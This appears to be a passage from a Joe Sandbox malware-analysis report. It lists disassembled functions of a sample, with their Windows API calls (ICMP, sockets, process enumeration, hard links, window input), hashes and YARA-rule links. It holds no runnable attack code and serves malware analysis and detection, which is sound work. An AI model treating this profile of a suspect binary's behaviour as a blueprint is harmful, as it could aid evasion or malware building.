                                                                                                                  • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                  • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                  • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                  • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen
                                                                                                                • String ID: $OH$@OH$X
                                                                                                                • API String ID: 819131735-1394974532
                                                                                                                • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                Function 004117D8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(mscoree.dll,?,00411810,00411739,?,00418376,000000FF,0000001E,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004), ref: 004117E2
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004117F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 1646373207-1276376045
                                                                                                                • Opcode ID: a7685ab17104cc0c073debe12178e0060415aba7f1dae0483c91b0ec95b921c4
                                                                                                                • Instruction ID: 6b29009f96e0e291b67a18ed51c26f61cb0bd4e92b549ae29e71b4d684277c2c
                                                                                                                • Opcode Fuzzy Hash: a7685ab17104cc0c073debe12178e0060415aba7f1dae0483c91b0ec95b921c4
                                                                                                                • Instruction Fuzzy Hash: 42D0C9302402096B9F247BB29D09A5F3A5EBE80B613248836BD28D2160DAAAC8408668
                                                                                                                Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                Function 00422570 Relevance: 6.4, APIs: 5, Instructions: 181COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                • GetLastError.KERNEL32(?,00411376,00000000,00000010,?,?,?,00411402,00411766,0048C6A8,0000000C,0041142E,00411766,?,00411766), ref: 004226EB
                                                                                                                • GetLastError.KERNEL32(?,00411376,00000000,00000010,?,?,?,00411402,00411766,0048C6A8,0000000C,0041142E,00411766,?,00411766), ref: 00422778
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 4219743298-0
                                                                                                                • Opcode ID: 2fd8fadab811a430797da95cb73ff5430e569562758129bd436d71f1837a3659
                                                                                                                • Instruction ID: 318ae3f89a2250df876bedb69491e74a10a758e61cab592b37fb59630da9e0ad
                                                                                                                • Opcode Fuzzy Hash: 2fd8fadab811a430797da95cb73ff5430e569562758129bd436d71f1837a3659
                                                                                                                • Instruction Fuzzy Hash: 38510A71E04231BACF216B75BE44AAF7A64EF40364B60452BF85467391DBBC8C818B9D
                                                                                                                Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
                                                                                                                • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                • Opcode Fuzzy Hash: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
                                                                                                                • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                Function 0047375F Relevance: 6.2, APIs: 4, Instructions: 150processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2286883814-0
                                                                                                                • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                • #21.WSOCK32 ref: 004740E0
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1881357543-0
                                                                                                                • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004505BF
                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Proc$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2351499541-0
                                                                                                                • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
